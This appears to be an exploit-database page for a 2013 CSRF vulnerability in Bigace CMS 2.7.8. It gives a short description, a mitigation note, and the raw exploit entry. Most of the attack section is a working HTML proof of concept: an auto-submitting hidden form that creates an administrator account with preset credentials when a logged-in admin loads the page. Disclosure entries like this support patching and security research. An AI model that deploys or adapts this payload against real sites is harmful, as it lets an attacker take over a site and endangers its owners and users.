header-logo
Suggest Exploit
vendor:
Bigace CMS
by:
Yashar shahinzadeh
7,5
CVSS
HIGH
CSRF
352
CWE
Product Name: Bigace CMS
Affected Version From: 2.7.8
Affected Version To: 2.7.8
Patch Exists: NO
Related CWE: N/A
CPE: a:bigace:bigace_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux & Windows, PHP 5.2.9
2013

Bigace CMS CSRF – Adding an admin account

A CSRF vulnerability exists in Bigace CMS which allows an attacker to add an admin account by sending a malicious link to the victim. The malicious link contains a form with pre-filled values for the username, language, user groups, state, email, passwordnew and passwordcheck fields. When the victim visits the malicious link, the form is automatically submitted and an admin account is created.

Mitigation:

The application should verify that the request is coming from an authenticated user and not from an attacker. The application should also use a random token in the form to prevent CSRF attacks.
Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: Bigace CMS CSRF - Adding  an admin account
# Date: 2013 29 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://www.bigace.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 2.7.8
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Adding an admin account
 

1. CSRF - Adding an admin account:
==================================

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
                <input type="hidden" name="userName" value="yashar">
                <input type="hidden" name="language" value="en">
                <input type="hidden" name="userGroups[]" value="40">
				<input type="hidden" name="state" value="1">
				<input type="hidden" name="email" value="yashar@yashar.com">
				<input type="hidden" name="passwordnew" value="yashar">
				<input type="hidden" name="passwordcheck" value="yashar">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

Navigation

Suggest Exploit

Services By CQR